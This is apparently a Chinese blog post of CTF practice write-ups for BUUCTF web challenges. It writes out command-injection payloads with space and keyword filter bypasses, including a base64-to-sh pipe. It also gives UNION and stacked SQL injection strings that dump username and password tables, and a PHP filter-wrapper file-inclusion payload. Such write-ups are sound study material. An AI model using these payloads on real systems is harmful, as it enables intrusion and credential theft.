3.18练习

BUUCTF练习day2

[GXYCTF2019]Ping Ping Ping

ping题有点熟悉的命令注入,使用

复制代码
127.0.0.1;ls

可以得到当前目录的文件名

cat一下flag.php,发现不行

过滤了空格,那我们有什么方法绕过呢

  • <(重定向符号)
  • ${IFS}
  • IFS9
  • %09(tab键)

试一试发现过滤了<和${IFS}和%09,页面都回显出这个

试了一下$IFS$9可以,回显出这个页面

说明过滤了flag字符,那这里又可以学习关键词绕过知识点

  • catIFS9fl\ag.php

  • b=ag;a=fl;catIFS9ab.php

  • echoIFS9Y2F0JElGUyQ5ZmxhZy5waHA=|base64IFS9-d|sh

  • catIFS9fla*

    完整payload

    ?ip=127.0.0.1;a=fl;b=ag;catIFS9ab.php

[SUCTF 2019]EasySQL

输入1

输入1'没有任何回显

输入1"

这里确实与我之前做的SQL不同,普通的联合查询不行,学习一下别人的wpwp

可以学习到堆叠注入和一种情况数字回显字母不回显,说明有一个 或 结构

[极客大挑战 2019]LoveSQL

这是之前的遇到一个题目变形3.17练习

判断闭合方式

试一试1和1'和1"发现输入1'时回显不正常的页面(提示有语法错误)

那么闭合方式是单引号闭合

判断列数

使用(密码随便填的,用户名中的%23是#,起注释作用)

复制代码
1' order by 1,2,3,4%23

回显出的页面表示没有第4列

试一试三列,回显正常(没有报语法错误)

那么确定一共三列

查询回显位(从数据库将数据回显到页面的位置)

复制代码
-1' union select 1,2,3%23

图中的2和3的位置就是回显位,说明这个题有两个回显位

查询数据库名,用户

复制代码
-1' union select 1,user(),database()%23

说明当前数据库是geek用户是root

查询表名

复制代码
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek'%23

可以知道当前数据库的表有两个geekuser和l0ve1ysq1(这是一个题目,我们要的是用户信息,因为一般有flag)

查询geekuser表的字段名

复制代码
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='geekuser'%23

那么可以知道geek这个数据库的geekuser这张表下有三个字段id,username,password,

那我们将它们查询出来

查询字段内容

复制代码
1' union select 1,group_concat(id,0x2A,username,0x3A,password),3 from geekuser%23

那现在已经知道了账号和密码,那就拿去登录

发现不对,那就看看另一个表

思路一样

查询字段名

复制代码
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'%23

查询字段名(0x3A表示将这些字段内容以冒号分隔开)

复制代码
1' union select 1,group_concat(id,0x3A,username,0x3A,password),3 from l0ve1ysq1%23

得到flag

复制代码
flag{2cf1ec82-e163-471a-a6ce-d00a01219738}

[强网杯 2019]随便注(字符型)

又是一道SQL注入

判断注入点

试一试1'

出现语法错误,闭合方式是单引号

判断列数

复制代码
1' order by 4%23

没有第四列(通过相同的方式判断出只有两列)

复制代码
1' order by 2%23

寻找回显位

在寻找回显位时,发现select被过滤了

select被禁用,联合查询,报错注入,布尔,时间盲注就都不可以使用了,我们只剩下堆叠注入

查询表名

复制代码
1'; show tables;#

有两个表1919810931114514和words

查询两个表的字段

当数据表为数字时需要用反引号括起来

复制代码
1'; show columns from words;#
1'; show columns from `1919810931114514`;#

使用handler代替select

参考wp

复制代码
1'; handler `1919810931114514`open as a; handler a read next;#

[极客大挑战 2019]Secret File

打开环境,没有什么发现,查看源代码,发现一个链接

点击后发现一个

再点击,题目题目告述我们结束了,但是什么都没有发现,那就抓包看看

从点击select开始

发现一个注释后的页面

打开,发现代码,要进行代码审计

文件包含漏洞,常见思路使用伪协议

复制代码
php://filter/convert.base64-encode/resource=flag.php

解码可以得到flag

相关推荐
淡水猫.18 分钟前
ApacheSuperset CVE-2023-27524
安全·web安全
恰薯条的屑海鸥44 分钟前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习
Bruce_Liuxiaowei1 小时前
Web安全深度解析:源码泄漏与未授权访问漏洞全指南
安全·web安全
CRMEB定制开发2 小时前
CRMEB 中 PHP 快递查询扩展实现:涵盖一号通、阿里云、腾讯云
阿里云·php·腾讯云·商城系统·商城源码
CRMEB定制开发2 小时前
PHP 打印扩展开发:从易联云到小鹅通的多驱动集成实践
php·小程序源码·商城源码·微信商城·php商城源码
Bruce_Liuxiaowei3 小时前
PHP文件包含漏洞详解:原理、利用与防御
开发语言·网络安全·php·文件包含
网安INF4 小时前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入
恰薯条的屑海鸥5 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十期-Over Permission 模块)
学习·安全·web安全·渗透测试·网络安全学习
Bruce_Liuxiaowei6 小时前
深入理解PHP安全漏洞:文件包含与SSRF攻击全解析
开发语言·网络安全·php
痴人说梦梦中人12 小时前
自建 dnslog 回显平台:渗透测试场景下的隐蔽回显利器
web安全·网络安全·渗透测试·php·工具